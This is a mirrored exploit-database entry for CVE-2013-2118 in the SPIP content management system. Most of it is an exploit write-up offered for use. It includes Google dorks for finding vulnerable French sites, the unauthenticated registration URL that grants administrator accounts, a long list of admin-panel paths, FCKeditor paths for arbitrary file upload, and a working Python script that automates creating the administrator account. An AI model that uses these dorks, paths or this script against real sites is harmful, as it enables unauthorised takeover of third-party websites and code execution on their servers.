Vulners
Lucene search
SPIP CMS 2.x / 3.x Add Administrator / File Upload
🗓️ 26 Mar 2019 00:00:00Reported by KingSkrupellosType 
packetstorm🔗 packetstormsecurity.com👁 380 Views
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | CVE-2013-2118 | 9 Jul 201317:00 | – | cve |
 | CVE-2013-2118 | 9 Jul 201317:00 | – | cvelist |
 | CVE-2013-2118 | 9 Jul 201317:00 | – | debiancve |
 | Debian DSA-2694-1 : spip - privilege escalation | 28 May 201300:00 | – | nessus |
 | SPIP CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation | 19 May 201400:00 | – | exploitdb |
 | EUVD-2013-2087 | 9 Jul 201317:00 | – | euvd |
 | SPIP CMS 2.0.23 2.1.223.0.9 - Privilege Escalation | 19 May 201400:00 | – | exploitpack |
 | CVE-2013-2118 | 9 Jul 201317:55 | – | nvd |
 | Debian: Security Advisory (DSA-2694-1) | 25 May 201300:00 | – | openvas |
| Debian Security Advisory DSA 2694-1 (spip - privilege escalation) | 26 May 201300:00 | – | openvas |
10
`############################################################################################
# Exploit Title : Spip CMS 2.x/3.x Add Administrator Account & Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Published Date : 26/03/2019
# First Discovered Date : 2013 - 2014
# Vendor Homepage : spip.net
# Software Download Links : files.spip.org/spip/archives/
files.spip.net/spip/archives/SPIP-v2-1.16.zip
files.spip.net/spip/archives/SPIP-v2-0-9.zip
files.spip.net/spip/archives/SPIP-v2-1.22.zip
files.spip.net/spip/archives/SPIP-v2-0-23.zip
files.spip.net/spip/archives/SPIP-v3.0.9.zip
# Software Information Link : spip.net/rubrique25.html
# Software Affected Versions :
Spip 2.x - 3.x - 3.0.9 / 2.0.0 - 2.0.10 -
2.0.20 - 2.1.5 - 2.1.22 / 2.0.23 - 2.1.15
3.0.0 - 3.0.1 - 3.0.x - All Spip CMS 2.x - 3.x Version
# Solution : Update/Upgrade to Higher Version to 3.1.0 and higher
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks :
inurl:/spip.php?rubrique site:fr
inurl:/spip.php?article site:fr
# CVE : cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2118
cvedetails.com/cve/CVE-2013-2118/
# Vulnerability Type : CWE-286 [ Incorrect User Management ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Cyberizm.Org Reference Link :
cyberizm.org/cyberizm-spip-cms-2-0-admin-panele-erisim-acigi.html
############################################################################################
# Description about Software :
***************************
SPIP is a free software content management system. SPIP is a publishing system for the Internet in which great importance is a
ttached to collaborative working, to multilingual environments, and to simplicity of use for web authors.
It is free software, distributed under the GNU/GPL licence. This means that it can be used for any Internet site, whether personal
or institutional, non-profit or commercial. SPIP is developed (programmed, documented, translated, etc.) and used by a community
in which there is an open invitation to participate.
############################################################################################
# According to the CVE-2013-2118 :
********************************
SPIP 3.0.x before 3.0.9, 2.1.x before 2.1.22, and 2.0.x before 2.0.23 allows remote
attackers to gain privileges and "take editorial control" via vectors related to ecrire/inc/filtres.php.
############################################################################################
# Impact :
***********
The software SPIP 2.x/3.x does not properly manage a user within its environment.
This vulnerability allows remote attackers to create an administrator account on the CMS without being authenticated.
To exploit the flaw, a SMTP configuration has to be configured on SPIP because the password is sent by mail.
Users can be assigned to the wrong group class of permissions resulting in unintended access rights to sensitive objects.
Spip 2.x/3.x is prone to an arbitrary file-upload vulnerability. An attacker may leverage this issue to upload arbitrary
files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
############################################################################################
# Vulnerable File Source Code : [ filtres.php ]
***************************************
File => /ecrire/inc/filtres.php
core.spip.net/projects/spip/repository/revisions/20541/entry/branches/spip-2.1/ecrire/inc/filtres.php
# Vulnerability :
**************
Add New Administrator/Author Account
/spip.php?page=identifiants&mode=0minirezo
It says : "Vous inscrire sur ce site " means " Register to this Site.
After Registration - it says :
Votre nouvel identifiant vient de vous être envoyé par email.
Your new login details has just been sent to you by email.
Register yourself - Give a Random Nickname and Your Real E-Mail Address.
The System will send you automatically a password for Admin/Author Login.
There is Auto Exploiter down. You can use this.
# Admin Panel Login Path :
************************
/ecrire
/spip.php?page=login&url=%2Fecrire%2F
/?page=login&lang=fr
# Useable Admin Control Panel URL Links :
***************************************
/ecrire/?exec=accueil
/ecrire/?bonjour=oui
/ecrire/?exec=rubrique_edit&new=oui
/ecrire/?exec=rubriques_edit&new=oui
/IMG/html/....
/IMG/txt/...
/IMG/jpg/...
/IMG/gif/..
/IMG/png/...
/ecrire/?exec=recherche
/ecrire/?exec=articles
/ecrire/?exec=article_edit&new=oui
/ecrire/?exec=articles_edit&new=oui
/ecrire/?exec=article&id_article=[ID-NUMBER]
/ecrire/?exec=articles&id_article=[ID-NUMBER]
/ecrire/?exec=articles_edit&id_article=[ID-NUMBER]
/ecrire/?exec=naviguer&id_rubrique=[ID-NUMBER]
/ecrire/?exec=rubriques_edit&id_rubrique=[ID-NUMBER]&retour=nav
/ecrire/?exec=rubriques_edit&new=oui&id_parent=[ID-NUMBER]
/ecrire/?exec=mot_edit&new=oui
/ecrire/?exec=site_edit&new=oui
/ecrire/?exec=breve_edit&new=oui
/ecrire/?exec=breve_edit&new=oui&id_rubrique=[ID-NUMBER]
/ecrire/?exec=auteurs
/ecrire/?exec=auteur_edit&new=oui
/ecrire/?exec=auteurs&statut=0minirezo
/ecrire/?exec=auteur_edit&id_auteur=[AUTHOR-ID-NUMBER]
/ecrire/?exec=auteurs&statut=1comite
/ecrire/?exec=auteur&id_auteur=[ID-NUMBER]
/ecrire/?exec=message_edit&new=oui&to=[ID-NUMBER]&redirect=.%2F%3Fexec%3Dauteur%26amp%3Bid_auteur%3D[ID-NUMBER]
/ecrire/?exec=auteurs&statut=!0minirezo,1comite,5poubelle
/ecrire/?exec=statistiques_referers
/ecrire/?exec=rubriques
/ecrire/?exec=rubrique&id_rubrique=[ID-NUMBER]
/ecrire/?exec=rubrique_edit&id_rubrique=[ID-NUMBER]
/ecrire/?exec=article_edit&id_article=[ID-NUMBER]
/ecrire/?exec=brouteur
/ecrire/?exec=clevermail
/ecrire/?exec=clevermail_lists
/ecrire/?exec=clevermail_list_edit&lst_id=-1
/ecrire/?exec=clevermail_subscribers
/ecrire/?exec=clevermail_subscriber_new
/ecrire/?exec=clevermail_settings_edit
/ecrire/?exec=forum
/ecrire/?exec=forum&repondre=[ID-NUMBER]
/ecrire/?exec=calendrier
/ecrire/?exec=messages
/ecrire/?exec=message&id_message=[ID-NUMBER]
/ecrire/?exec=message_edit&id_message=[ID-NUMBER]
/ecrire/?exec=documents
/ecrire/?exec=document_edit&id_document=[ID-NUMBER]
/ecrire/?exec=documents&statut=publie
/ecrire/?exec=documents&statut=publie&media=image
/ecrire/?exec=documents&statut=publie&media=audio
/ecrire/?exec=documents&statut=publie&media=video
/ecrire/?exec=documents&statut=publie&media=file
/ecrire/?exec=documents&media=file&statut=publie
/ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle
/ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle&distant=oui
/ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle&distant=non
/ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle&distant=non&orphelins=1
/ecrire/?exec=documents&media=file&statut=prepa%7Cpoubelle&distant=non&brise=1
/ecrire/?exec=documents&statut=publie&media=file&extension=html&ajouter=oui
/ecrire/?exec=mots
/ecrire/?exec=groupe_mots_edit&id_groupe=[ID-NUMBER]
/ecrire/?exec=mot_edit&new=oui&id_groupe=[ID-NUMBER]&redirect=.%2F%3Fexec%3Dmots
/ecrire/?exec=sites
/ecrire/?exec=site&id_syndic=[ID-NUMBER]
/ecrire/?exec=site_edit&id_syndic=[ID-NUMBER]
/ecrire/?exec=breves
/ecrire/?exec=breve&id_breve=[ID-NUMBER]
/ecrire/?exec=breve_edit&id_breve=[ID-NUMBER]
/ecrire/?exec=message&id_message=[ID-NUMBER]
/ecrire/?exec=message_edit&id_message=[ID-NUMBER]
/ecrire/?exec=revision&id_objet=[ID-NUMBER]&objet=article&id_version=[ID-NUMBER]
/ecrire/?exec=article_edit&id_article=[ID-NUMBER]
/ecrire/?exec=infos_perso
/spip.php?auteur[ID-NUMBER]&var_mode=preview
/ecrire/?exec=visiteurs
/ecrire/?exec=suivi_edito
/ecrire/?exec=article&id_article=[ID-NUMBER]
/ecrire/?exec=article_edit&id_article=[ID-NUMBER]
/ecrire/?exec=synchro
/ecrire/?exec=revisions
/ecrire/?exec=revision&id_objet=[ID-NUMBER]&objet=article&id_version=[ID-NUMBER]
/ecrire/?exec=article_edit&id_article=[ID-NUMBER]
/ecrire/?exec=controler_forum
/ecrire/?exec=controler_forum&type_message=interne
/ecrire/?exec=controler_forum&type_message=vide
/ecrire/?exec=stats_visites
/ecrire/?exec=stats_referers
/ecrire/?exec=stats_repartition
/ecrire/?exec=stats_lang
/ecrire/?exec=navigation&menu=menu_squelette
/ecrire/?exec=configurer_mediabox
/ecrire/?exec=zengarden
/ecrire/?exec=configurer_sarkaspip&cfg=accueil
/ecrire/?exec=admin_vider
/ecrire/?exec=sauvegarder
/ecrire/?exec=restaurer
/ecrire/?exec=admin_tech
/ecrire/?exec=job_queue
/ecrire/?exec=configurer_identite
/local/cache-vignettes/.......
/IMG/png/....
/IMG/gif/.....
/IMG/jpg/....
/ecrire/?exec=configurer_langue
/ecrire/?exec=config_lang
/ecrire/?exec=admin_tech
/ecrire/?exec=admin_vider
/ecrire/?exec=admin_plugin
/ecrire/?exec=cfg
/ecrire/?exec=configurer_multilang
/ecrire/?exec=configurer_contenu
/ecrire/?exec=configurer_interactions
/ecrire/?exec=configurer_avancees
/ecrire/?exec=admin_plugin
/ecrire/?exec=admin_plugin&voir=tous
/ecrire/?exec=admin_plugin&voir=actif
/ecrire/?exec=admin_plugin&voir=inactif
/ecrire/?exec=admin_plugin&voir=inactif&verrouille=tous
/ecrire/?exec=admin_plugin&voir=inactif&verrouille=non
/ecrire/?exec=configurer_forum
/ecrire/?exec=configurer_revisions
/ecrire/?exec=configurer_urls
/ecrire/?exec=charger_plugin
/ecrire/?exec=rubriques
/ecrire/?exec=articles
/ecrire/?exec=documents
/ecrire/?exec=navigation&menu=menu_edition
/ecrire/?exec=navigation&menu=menu_administration
/ecrire/?exec=navigation&menu=menu_configuration
/ecrire/?exec=configuration
/ecrire/?exec=config_identite
/ecrire/?exec=recherche&recherche=
/spip.php?page=distrib
/spip.php?article[ID-NUMBER]&lang=fr
/ecrire/?exec=aide_index&var_lang=en
# Arbitrary File Upload / Insert File Exploit :
****************************************
/plugins/fckeditor-spip-2/fckeditor/editor/filemanager/connectors/uploadtest.html
/plugins/auto/fckeditor-spip-2/fckeditor/editor/filemanager/connectors/uploadtest.html
/plugins/fckeditor-spip-2-4/fckeditor/editor/filemanager/connectors/uploadtest.html
/userfiles/....
/UserFiles/...
/ecrire/?exec=article_edit&new=oui
/ecrire/?exec=articles_edit&new=oui
/IMG/html/[YOURFILENAME].html .jpg gif .png .txt
/local/cache-vignettes/.......
/IMG/png/....
/IMG/gif/.....
/IMG/jpg/....
# Python Auto Exploiter :
***********************
import urllib, urllib2
import cookielib
import sys
import re
def send_request(urlOpener, url, post_data=None):
request = urllib2.Request(url)
url = urlOpener.open(request, post_data)
return url.read()
if len(sys.argv) < 4:
print "SPIP < 3.x - 2.x - 3.0.9 / 2.1.22 / 2.0.23 exploit by KingSkrupellos Cyberizm Digital Security Team\n\tUsage: python script.py <SPIP base_url> <login> <mail>"
exit()
base_url = sys.argv[1]
login = sys.argv[2]
mail = sys.argv[3]
cookiejar = cookielib.CookieJar()
urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
formulaire = send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo")
print "[+] First request sended..."
m = re.search("<input name='formulaire_action_args' type='hidden'\n[^>]*", formulaire)
m = re.search("(?<=value=')[\w\+/=]*",m.group(0));
formulaire_data = {'var_ajax' : 'form',
'page' : 'identifiants',
'mode' : '0minirezo',
'formulaire_action' : 'inscription',
'formulaire_action_args' : m.group(0),
'nom_inscription' : login,
'mail_inscription' : mail,
'nobot' : ''
}
formulaire_data = urllib.urlencode(formulaire_data)
send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo", formulaire_data)
print "[+] Second request sended"
print "[+] You should receive an email with credentials soon :) "
############################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
############################################################################################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Mar 2019 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.11956